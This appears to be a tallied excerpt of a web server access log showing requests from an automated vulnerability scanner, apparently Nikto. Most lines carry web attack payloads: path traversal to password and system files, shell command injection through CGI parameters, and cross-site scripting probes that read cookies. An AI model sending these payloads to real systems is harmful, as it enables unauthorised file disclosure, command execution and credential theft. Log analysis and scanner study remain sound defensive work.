1 GET /cgi-bin/include/new-visitor.inc.php HTTP/1.1
1 GET /cgi-bin/index.cgi HTTP/1.1
1 GET /cgi-bin/index.js0x70 HTTP/1.1
1 GET /cgi-bin/index.php HTTP/1.1
1 GET /cgi-bin/index.pl HTTP/1.1
1 GET /cgi-bin/info.cgi HTTP/1.1
1 GET /cgi-bin/info.sh HTTP/1.1
1 GET /cgi-bin/info2www '(../../../../../../../bin/mail
1 GET /cgi-bin/info2www HTTP/1.1
1 GET /cgi-bin/infosrch.cgi HTTP/1.1
1 GET /cgi-bin/input.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ HTTP/1.1
1 GET /cgi-bin/input2.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ HTTP/1.1
1 GET /cgi-bin/listrec.pl HTTP/1.1
1 GET /cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/loadpage.cgi?user_id=1&file=..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini HTTP/1.1
1 GET /cgi-bin/loadpage.cgi HTTP/1.1
1 GET /cgi-bin/log/nether-log.pl?checkit HTTP/1.1
1 GET /cgi-bin/login.cgi HTTP/1.1
1 GET /cgi-bin/login.php HTTP/1.1
1 GET /cgi-bin/login.pl?course_id=\\\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt; HTTP/1.1
1 GET /cgi-bin/login.pl HTTP/1.1
1 GET /cgi-bin/lwgate.cgi HTTP/1.1
1 GET /cgi-bin/lwgate HTTP/1.1
1 GET /cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/mail HTTP/1.1
1 GET /cgi-bin/mailit.pl HTTP/1.1
1 GET /cgi-bin/mailnews.cgi HTTP/1.1
1 GET /cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&fileNikto=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/mastergate/search.cgi?search=0&search_on=all HTTP/1.1
1 GET /cgi-bin/mchat.cgi HTTP/1.1
1 GET /cgi-bin/mgrqcgi HTTP/1.1
1 GET /cgi-bin/mini_logger.cgi HTTP/1.1
1 GET /cgi-bin/mkilog.exe HTTP/1.1
1 GET /cgi-bin/mkplog.exe HTTP/1.1
1 GET /cgi-bin/mmstdod.cgi HTTP/1.1
1 GET /cgi-bin/moin.cgi?test HTTP/1.1
1 GET /cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/mrtg.cgi?cfg=blah HTTP/1.1
1 GET /cgi-bin/mt-static/ HTTP/1.1
1 GET /cgi-bin/mt-static/mt-check.cgi HTTP/1.1
1 GET /cgi-bin/mt-static/mt-load.cgi HTTP/1.1
1 GET /cgi-bin/mt-static/mt.cfg HTTP/1.1
1 GET /cgi-bin/mt/ HTTP/1.1
1 GET /cgi-bin/mt/mt-check.cgi HTTP/1.1
1 GET /cgi-bin/mt/mt-load.cgi HTTP/1.1
1 GET /cgi-bin/mt/mt.cfg HTTP/1.1
1 GET /cgi-bin/multihtml.pl?multi=/etc/passwd%00html HTTP/1.1
1 GET /cgi-bin/musicqueue.cgi HTTP/1.1
1 GET /cgi-bin/myguestbook.cgi?action=view HTTP/1.1
1 GET /cgi-bin/nbmember.cgi?cmd=list_all_users HTTP/1.1
1 GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/netpad.cgi HTTP/1.1
1 GET /cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/nimages.php HTTP/1.1
1 GET /cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/nph-error.pl HTTP/1.1
1 GET /cgi-bin/nph-publish.cgi HTTP/1.1
1 GET /cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0 HTTP/1.1
1 GET /cgi-bin/nph-test-cgi HTTP/1.1
1 GET /cgi-bin/opendir.php?/etc/passwd HTTP/1.1
1 GET /cgi-bin/orders/orders.txt HTTP/1.1
1 GET /cgi-bin/pagelog.cgi HTTP/1.1
1 GET /cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.1
1 GET /cgi-bin/pathtest.pl HTTP/1.1
1 GET /cgi-bin/pbcgi.cgi?Nikto=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E HTTP/1.1
1 GET /cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E HTTP/1.1
1 GET /cgi-bin/perl.exe?-v HTTP/1.1
1 GET /cgi-bin/perl.exe HTTP/1.1
1 GET /cgi-bin/perl?-v HTTP/1.1
1 GET /cgi-bin/perl HTTP/1.1
1 GET /cgi-bin/perlshop.cgi HTTP/1.1
1 GET /cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|' HTTP/1.1
1 GET /cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|' HTTP/1.1
1 GET /cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd HTTP/1.1
1 GET /cgi-bin/phf?QNikto=root%0Acat%20/etc/passwd%20 HTTP/1.1
1 GET /cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20 HTTP/1.1
1 GET /cgi-bin/phf HTTP/1.1
1 GET /cgi-bin/photo/ HTTP/1.1
1 GET /cgi-bin/photo/manage.cgi HTTP/1.1
1 GET /cgi-bin/photo/protected/manage.cgi HTTP/1.1
1 GET /cgi-bin/php-cgi HTTP/1.1
1 GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.1
1 GET /cgi-bin/php.cgi HTTP/1.1
1 GET /cgi-bin/php.fcgi HTTP/1.1
1 GET /cgi-bin/php4 HTTP/1.1
1 GET /cgi-bin/php5 HTTP/1.1
1 GET /cgi-bin/php HTTP/1.1
1 GET /cgi-bin/plusmail HTTP/1.1
1 GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\\etc\\passwd%00 HTTP/1.1
1 GET /cgi-bin/post32.exe|dir%20c:\\\\ HTTP/1.1
1 GET /cgi-bin/ppdscgi.exe HTTP/1.1
1 GET /cgi-bin/printenv HTTP/1.1
1 GET /cgi-bin/probecontrol.cgi?command=enable&userNikto=cancer&password=killer HTTP/1.1
1 GET /cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer HTTP/1.1
1 GET /cgi-bin/processit.pl HTTP/1.1
1 GET /cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10 HTTP/1.1
1 GET /cgi-bin/query?mss=%2e%2e/config HTTP/1.1
1 GET /cgi-bin/query HTTP/1.1
1 GET /cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= HTTP/1.1
1 GET /cgi-bin/randhtml.cgi HTTP/1.1
1 GET /cgi-bin/realhelpdesk.cgi HTTP/1.1
1 GET /cgi-bin/realsignup.cgi HTTP/1.1
1 GET /cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E HTTP/1.1
1 GET /cgi-bin/redirect HTTP/1.1
1 GET /cgi-bin/restore_config.cgi HTTP/1.1
1 GET /cgi-bin/retrieve_password.pl HTTP/1.1
1 GET /cgi-bin/robadmin.cgi HTTP/1.1
1 GET /cgi-bin/rpm_query HTTP/1.1
1 GET /cgi-bin/ruby.rb HTTP/1.1
1 GET /cgi-bin/rwwwshell.pl HTTP/1.1
1 GET /cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 HTTP/1.1
1 GET /cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 HTTP/1.1
1 GET /cgi-bin/sbcgi/sitebuilder.cgi HTTP/1.1
1 GET /cgi-bin/scgiwrap HTTP/1.1
1 GET /cgi-bin/scoadminreg.cgi HTTP/1.1
1 GET /cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid fileNikto]
1 GET /cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]
1 GET /cgi-bin/search.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini HTTP/1.1
1 GET /cgi-bin/search.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini HTTP/1.1
1 GET /cgi-bin/search.cgi HTTP/1.1
1 GET /cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script> HTTP/1.1
1 GET /cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc HTTP/1.1
2 GET /cgi-bin/search HTTP/1.1
1 GET /cgi-bin/sendpage.pl?message=test\\;/bin/ls%20/etc;echo%20\\message HTTP/1.1
1 GET /cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/server.php HTTP/1.1
1 GET /cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd HTTP/1.1
1 GET /cgi-bin/shop.cgi?page=../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/shop/auth_data/auth_user_file.txt HTTP/1.1
1 GET /cgi-bin/shop/orders/orders.txt HTTP/1.1
1 GET /cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/shtml.dll HTTP/1.1
1 GET /cgi-bin/signup.cgi HTTP/1.1
1 GET /cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd| HTTP/1.1
1 GET /cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd| HTTP/1.1
1 GET /cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd| HTTP/1.1
1 GET /cgi-bin/snorkerz.bat HTTP/1.1
1 GET /cgi-bin/snorkerz.cmd HTTP/1.1
1 GET /cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00 HTTP/1.1
1 GET /cgi-bin/spin_client.cgi?aaaaaaaa HTTP/1.1
1 GET /cgi-bin/ss HTTP/1.1
1 GET /cgi-bin/sscd_suncourier.pl HTTP/1.1
1 GET /cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
1 GET /cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E HTTP/1.1
1 GET /cgi-bin/stat.pl HTTP/1.1
1 GET /cgi-bin/stats/statsbrowse.asp?filepath=c:\\&Opt=3 HTTP/1.1
1 GET /cgi-bin/status HTTP/1.1
1 GET /cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html HTTP/1.1
1 GET /cgi-bin/store/agora.cgi?page=whatever33.html HTTP/1.1
1 GET /cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/sws/admin.html HTTP/1.1
1 GET /cgi-bin/sysinfo.pl HTTP/1.1
1 GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.1
1 GET /cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&fileNikto=/../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script> HTTP/1.1
1 GET /cgi-bin/test-cgi.pl HTTP/1.1
1 GET /cgi-bin/test-cgi.tcl HTTP/1.1
1 GET /cgi-bin/test-cgi?/* HTTP/1.1
1 GET /cgi-bin/test-cgi HTTP/1.1
1 GET /cgi-bin/test-env HTTP/1.1
1 GET /cgi-bin/test.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ HTTP/1.1
1 GET /cgi-bin/test.cgi.php HTTP/1.1
1 GET /cgi-bin/test.cgi HTTP/1.1
1 GET /cgi-bin/test.py HTTP/1.1
1 GET /cgi-bin/test.sh HTTP/1.1
1 GET /cgi-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt; HTTP/1.1
1 GET /cgi-bin/test_cgi.php HTTP/1.1
1 GET /cgi-bin/test_cgi.pl HTTP/1.1
1 GET /cgi-bin/test HTTP/1.1
1 GET /cgi-bin/testcgi.exe HTTP/1.1
1 GET /cgi-bin/testing_whatever HTTP/1.1
1 GET /cgi-bin/title.cgi HTTP/1.1
1 GET /cgi-bin/tmUnblock.cgi HTTP/1.1
1 GET /cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/troops.cgi HTTP/1.1
1 GET /cgi-bin/tst.bat|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\, HTTP/1.1
1 GET /cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/uname.cgi HTTP/1.1
1 GET /cgi-bin/unlg1.1 HTTP/1.1
1 GET /cgi-bin/unlg1.2 HTTP/1.1
1 GET /cgi-bin/update.dpgs HTTP/1.1
1 GET /cgi-bin/upload.cgi HTTP/1.1
1 GET /cgi-bin/uploader.exe HTTP/1.1
1 GET /cgi-bin/uptime HTTP/1.1
1 GET /cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E HTTP/1.1
1 GET /cgi-bin/view-source?view-source HTTP/1.1
1 GET /cgi-bin/view-source HTTP/1.1
1 GET /cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\\\"><script>alert('Vulnerable')</script>; HTTP/1.1
1 GET /cgi-bin/viewcvs.cgi HTTP/1.1
1 GET /cgi-bin/viewsource?/etc/passwd HTTP/1.1
1 GET /cgi-bin/viralator.cgi HTTP/1.1
1 GET /cgi-bin/virgil.cgi HTTP/1.1
1 GET /cgi-bin/visadmin.exe HTTP/1.1
1 GET /cgi-bin/vpasswd.cgi HTTP/1.1
1 GET /cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /cgi-bin/wais.pl HTTP/1.1
1 GET /cgi-bin/way-board.cgi?db=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/wconsole.dll HTTP/1.1
1 GET /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD HTTP/1.1
1 GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.1
1 GET /cgi-bin/webdist.cgi HTTP/1.1
1 GET /cgi-bin/webdriver HTTP/1.1
1 GET /cgi-bin/webfind.exe?keywords=01234567890123456789 HTTP/1.1
1 GET /cgi-bin/webgais HTTP/1.1
1 GET /cgi-bin/webif.cgi HTTP/1.1
1 GET /cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/webmap.cgi HTTP/1.1
1 GET /cgi-bin/webplus.exe?about HTTP/1.1
1 GET /cgi-bin/webplus?about HTTP/1.1
1 GET /cgi-bin/webplus?script=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/websendmail HTTP/1.1
1 GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/welcome HTTP/1.1
1 GET /cgi-bin/where.pl?sd=ls%20/etc HTTP/1.1
1 GET /cgi-bin/whois.cgi?action=load&whois=%3Bid HTTP/1.1
1 GET /cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd HTTP/1.1
1 GET /cgi-bin/whois.cgi HTTP/1.1
1 GET /cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd HTTP/1.1
1 GET /cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd HTTP/1.1
1 GET /cgi-bin/windmail.exe HTTP/1.1
1 GET /cgi-bin/windmail HTTP/1.1
1 GET /cgi-bin/wrap.cgi HTTP/1.1
2 GET /cgi-bin/wrap HTTP/1.1
1 GET /cgi-bin/ws_ftp.ini HTTP/1.1
1 GET /cgi-bin/wwwadmin.pl HTTP/1.1
2 GET /cgi-bin/wwwwais HTTP/1.1
1 GET /cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-exe/ HTTP/1.1
1 GET /cgi-home/ HTTP/1.1
1 GET /cgi-local/ HTTP/1.1
1 GET /cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /cgi-local/cgiemail-1.6/cgicso?query=AAA HTTP/1.1
1 GET /cgi-mod/ HTTP/1.1
1 GET /cgi-perl/ HTTP/1.1
1 GET /cgi-shl/win-c-sample.exe HTTP/1.1
1 GET /cgi-sys/ HTTP/1.1
1 GET /cgi-win/ HTTP/1.1
1 GET /cgi-win/cgitest.exe HTTP/1.1
1 GET /cgi.cgi/ HTTP/1.1
1 GET /cgi/ HTTP/1.1
1 GET /cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\\windows\\win.ini HTTP/1.1
1 GET /cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\\winnt\\win.ini HTTP/1.1
1 GET /cgi/cgiproc? HTTP/1.1
1 GET /cgi_wrapper HTTP/1.1
1 GET /cgibin/ HTTP/1.1
1 GET /cgiinfo.cgi HTTP/1.1
1 GET /cgis/ HTTP/1.1
1 GET /cgis/wwwboard/wwwboard.cgi HTTP/1.1
1 GET /cgis/wwwboard/wwwboard.pl HTTP/1.1
1 GET /cgitest.py HTTP/1.1
1 GET /chassis/config/GeneralChassisConfig.html HTTP/1.1
1 GET /chat/!nicks.txt HTTP/1.1
1 GET /chat/!pwds.txt HTTP/1.1
1 GET /chat/data/usr HTTP/1.1
1 GET /chat/register.php?register=yes&username=OverG&email=<script>alert%20(\\\"Vulnerable\\\")</script>&email1=<script>alert%20(\\\"Vulnerable\\\")</script> HTTP/1.1
1 GET /cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\\\">< script>alert(1)/script><\\\"
1 GET /cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script> HTTP/1.1
1 GET /client/ HTTP/1.1
1 GET /clientaccesspolicy.xml HTTP/1.1
1 GET /cliente/ HTTP/1.1
1 GET /clientes/ HTTP/1.1
1 GET /clients/ HTTP/1.1
1 GET /clusterframe.jsp?cluster=<script>alert(document.cookie)</script> HTTP/1.1
1 GET /clusterframe.jsp HTTP/1.1
1 GET /cms/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00 HTTP/1.1
1 GET /cms/typo3conf/ HTTP/1.1
1 GET /cms/typo3conf/database.sql HTTP/1.1
1 GET /cms/typo3conf/localconf.php HTTP/1.1
1 GET /code/ HTTP/1.1
1 GET /com/ HTTP/1.1
1 GET /com/novell/ HTTP/1.1
1 GET /com/novell/webaccess HTTP/1.1
1 GET /com HTTP/1.1
1 GET /comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview HTTP/1.1
1 GET /comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt; HTTP/1.1
1 GET /communicator/ HTTP/1.1
1 GET /compra/ HTTP/1.1
1 GET /compras/ HTTP/1.1
1 GET /compressed/ HTTP/1.1
1 GET /conecta/ HTTP/1.1
1 GET /config.php HTTP/1.1
2 GET /config/ HTTP/1.1
1 GET /config/checks.txt HTTP/1.1
1 GET /connect/ HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /console HTTP/1.1
1 GET /contact.cgi HTTP/1.1
1 GET /contents.php?new_language=elvish&mode=select HTTP/1.1
1 GET /contents/extensions/asp/1 HTTP/1.1
1 GET /correo/ HTTP/1.1
1 GET /count.cgi HTTP/1.1
1 GET /counter/1/n/n/0/3/5/0/a/123.gif HTTP/1.1
1 GET /counter/ HTTP/1.1
1 GET /cpanel/ HTTP/1.1
1 GET /cplogfile.log HTTP/1.1
2 GET /cpqlogin.htm HTTP/1.1
1 GET /credit/ HTTP/1.1
1 GET /crossdomain.xml HTTP/1.1
1 GET /crypto/ HTTP/1.1
1 GET /css HTTP/1.1
1 GET /cuenta/ HTTP/1.1
1 GET /cuentas/ HTTP/1.1
1 GET /current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1 HTTP/1.1
1 GET /customers/ HTTP/1.1
1 GET /cutenews/index.php?debug HTTP/1.1
1 GET /dan_o.dat HTTP/1.1
1 GET /dat/ HTTP/1.1
1 GET /data/ HTTP/1.1
1 GET /database/db2000.mdb HTTP/1.1
1 GET /dato/ HTTP/1.1
1 GET /datos/ HTTP/1.1
2 GET /db/ HTTP/1.1
1 GET /db/users.dat HTTP/1.1
1 GET /db HTTP/1.1
1 GET /dba4.nsf HTTP/1.1
1 GET /dbase/ HTTP/1.1
2 GET /debug/default/view?panel=config HTTP/1.1
1 GET /default.asp HTTP/1.1
1 GET /default.aspx HTTP/1.1
2 GET /default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
1 GET /default.htm HTTP/1.1
1 GET /default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E HTTP/1.1
1 GET /default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E HTTP/1.1
1 GET /defaultwebpage.cgi HTTP/1.1
1 GET /demo/ HTTP/1.1
1 GET /demos/ HTTP/1.1
1 GET /dev/ HTTP/1.1
1 GET /devel/ HTTP/1.1
1 GET /development/ HTTP/1.1
1 GET /diapo.php?rep=<script>alert(document.cookie)</script> HTTP/1.1
1 GET /dir/ HTTP/1.1
1 GET /directory/ HTTP/1.1
1 GET /doc-html/ HTTP/1.1
1 GET /doc/ HTTP/1.1
1 GET /doc/webmin.config.notes HTTP/1.1
1 GET /doc HTTP/1.1
1 GET /docs/showtemp.cfm?TYPE=JPEG&FILE=c:\\boot.ini HTTP/1.1
1 GET /domlog.nsf HTTP/1.1
1 GET /dostuff.php?action=modify_user HTTP/1.1
1 GET /down/ HTTP/1.1
1 GET /download.cgi HTTP/1.1
2 GET /download.php?op=viewdownload HTTP/1.1
1 GET /download.php?sortby=&dcategory=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /download/ HTTP/1.1
1 GET /downloads/ HTTP/1.1
1 GET /downloads/pafiledb.php?action=download&id=4?\\\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\" HTTP/1.1
1 GET /downloads/pafiledb.php?action=email&id=4?\\\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\" HTTP/1.1
1 GET /downloads/pafiledb.php?action=rate&id=4?\\\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\" HTTP/1.1
1 GET /easylog/easylog.html HTTP/1.1
1 GET /edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd HTTP/1.1
1 GET /ejemplo/ HTTP/1.1
1 GET /ejemplos/ HTTP/1.1
1 GET /emailfriend/emailarticle.php?id=\\\"<script>alert(document.cookie)</script> HTTP/1.1
1 GET /emailfriend/emailfaq.php?id=\\\"<script>alert(document.cookie)</script> HTTP/1.1
1 GET /emailfriend/emailnews.php?id=\\\"<script>alert(document.cookie)</script> HTTP/1.1
1 GET /employees/ HTTP/1.1
1 GET /eng/start/StatPtrGen.htm HTTP/1.1
1 GET /entropysearch.cgi HTTP/1.1
1 GET /env.cgi HTTP/1.1
1 GET /envia/ HTTP/1.1
1 GET /enviamail/ HTTP/1.1
1 GET /environment.cgi HTTP/1.1
1 GET /error/500error.jsp?et=1<script>alert('Vulnerable')</script>; HTTP/1.1
1 GET /error/HTTP_NOT_FOUND.html.var HTTP/1.1
1 GET /error_log HTTP/1.1
1 GET /esp?PAGE=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1
1 GET /events4.nsf HTTP/1.1
1 GET /eventum/forgot_password.php?email=\\\"><script>alert(document.cookie)</script> HTTP/1.1
1 GET /eventum/index.php?err=3&email=\\\"><script>alert(document.cookie)</script> HTTP/1.1
1 GET /ews/ews/architext_query.pl HTTP/1.1
1 GET /examples/basic/servlet/HelloServlet HTTP/1.1
1 GET /examples/cookie HTTP/1.1
1 GET /examples/jsp/snp/anything.snp HTTP/1.1
1 GET /examples/jsp/snp/snoop.jsp HTTP/1.1
1 GET /examples/jsp/source.jsp?? HTTP/1.1
1 GET /examples/servlet/AUX HTTP/1.1
1 GET /examples/servlet/TroubleShooter HTTP/1.1
1 GET /examples/servlets/index.html HTTP/1.1
1 GET /examples/session HTTP/1.1
1 GET /excel/ HTTP/1.1
1 GET /exchange/lib/AMPROPS.INC HTTP/1.1
1 GET /exchange/lib/ATTACH.INC HTTP/1.1
1 GET /exchange/lib/DELETE.INC HTTP/1.1
1 GET /exchange/lib/GETREND.INC HTTP/1.1
1 GET /exchange/lib/GETWHEN.INC HTTP/1.1
1 GET /exchange/lib/JSATTACH.INC HTTP/1.1
1 GET /exchange/lib/JSROOT.INC HTTP/1.1
1 GET /exchange/lib/JSUTIL.INC HTTP/1.1
1 GET /exchange/lib/LANG.INC HTTP/1.1
1 GET /exchange/lib/PAGEUTIL.INC HTTP/1.1
1 GET /exchange/lib/PUBFLD.INC HTTP/1.1
1 GET /exchange/lib/RENDER.INC HTTP/1.1
1 GET /exchange/lib/SESSION.INC HTTP/1.1
1 GET /exchange/lib/logon.inc HTTP/1.1
1 GET /exchange/root.asp?acs=anon HTTP/1.1
1 GET /exe/ HTTP/1.1
1 GET /exec/show/config/cr HTTP/1.1
1 GET /ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C HTTP/1.1
1 GET /ext.ini.%00.txt HTTP/1.1
1 GET /ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1 HTTP/1.1
1 GET /ezmlm-browse HTTP/1.1
7 GET /favicon.ico HTTP/1.1
1 GET /fbsd/ HTTP/1.1
1 GET /fcgi-bin/ HTTP/1.1
1 GET /fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /fcgi-bin/echo?foo=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /file-that-is-not-real-2002.php3 HTTP/1.1
1 GET /file/../../../../../../../../etc/ HTTP/1.1
2 GET /file/ HTTP/1.1
1 GET /file HTTP/1.1
1 GET /fileadmin/ HTTP/1.1
1 GET /files/ HTTP/1.1
1 GET /forgot_password.php?email=\\\"><script>alert(document.cookie)</script> HTTP/1.1
1 GET /formmail.cgi HTTP/1.1
1 GET /forum/My_eGallery/public/displayCategory.php HTTP/1.1
1 GET /forum/ HTTP/1.1
1 GET /forum/admin/database/wwForum.mdb HTTP/1.1
1 GET /forum/admin/wwforum.mdb HTTP/1.1
